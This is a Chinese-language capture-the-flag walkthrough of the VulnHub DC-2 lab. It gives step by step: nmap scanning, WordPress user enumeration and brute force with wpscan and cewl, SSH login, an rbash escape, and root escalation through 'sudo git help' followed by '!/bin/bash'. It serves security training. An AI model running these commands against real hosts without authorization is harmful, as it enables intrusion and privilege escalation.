Vulnhub靶机:DC-2渗透详细过程
前言
这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。
DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识:
- 基础的Linux命令及操作
- 基础的渗透测试工具使用(Kali / Parrot下的工具)
flag--1
先扫描c端,发现目标主机
nmap 192.168.132.0/24
看开启http服务,即打开浏览器输入ip,无法连接服务器且ip变域名
全面扫描目标主机IP
-A:进攻性综合扫描,能收集很多主要信息
-sV:扫描主要的服务信息
-p-:参数p后面是指定端口 后面-是代表所有端口
nmap -A -sV -p- -T4 192.168.132.147
扫描出ssh服务且端口修改为7744
扫描发现 Did not follow redirect to http://dc-2/未能重定向到域名dc-2,也就是说DNS服务器无法解析该域名
所以我们需要修改hosts文件内容,使域名dc-2对应ip
vim /etc/hosts
写入
192.168.132.147 dc-2
因为是在kali写入的,所以需要在kali的浏览器中打开该ip对应域名
在页面下找到flag1
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. 你常用的字典可能不管用,因此你可能需要cewl一下(cewl是kali的一个工具,可以通过爬行网站关键字建立密码字典). More passwords is always better, but sometimes you just can’t win them all. 密码越多越好,但有时候你不能赢得所有. Log in as one to see the next flag. 登录以获得下一个flag. If you can’t find it, log in as another. 如果你找不到,可以尝试登录另一个账号.
flag--2
通过flag1得到信息需要cewl一下
cewl dc-2 -w pwd.txt
用wpscan扫一下指定url,枚举其中用户名
wpscan --url dc-2 --enumerate u
将枚举出的用户名写到user.txt中,爆破,拿到账号密码
账号:jerry 密码:adipiscing
账号:tom 密码:parturient
找到网页后台登入地址/wp-admin
登入jerry的账号,找到flag2
if you can't exploit WordPress and take a shortcut, there is another way. 如果你不能利用WordPress找到一条捷径,你可以尝试另一条路 Hope you found another entry point. 希望你能找到另一个入口点
flag--3
根据flag的提示,之前扫描服务的时候有一个ssh端口开放
-p 7744指定ssh端口登陆(因为默认端口是22端口)
因为网页后台是登入jerry的账号成功的所以这里换一块路想到使用tom的账号
ssh [email protected] -p 7744
查看文件
ls
cat flag3.txt
使用cat无法查看flag3.txt但是使用vi可以查看
同时这里发现tom使用rbash:功能特别少,很多命令无法使用
所以我们要绕过rabsh
BASH_PATH[A]=/bin/sh;A
/bin/bash(此时还不能查看flag3.txt)
export PATH=$PATH:/bin/
flag--4
根据flag3提示切换jerry用户
su jerry
cd /home/jerry
ls
cat flag4.txt
flag--5
和dc1一样,suid提权
寻找root用户拥有的文件,并将错误写入/dev/null中
find / -perm -u=s -type f 2>/dev/null
sudo -l
发现git提权
sudo git help ifconfig
!/bin/bash完成提权
cd /root
ls
cat final-flag.txt
Rbash逃逸大全:
https://xz.aliyun.com/t/7642#toc-0
vulnhub之DC-2靶机渗透详细过程 - FreeBuf网络安全行业门户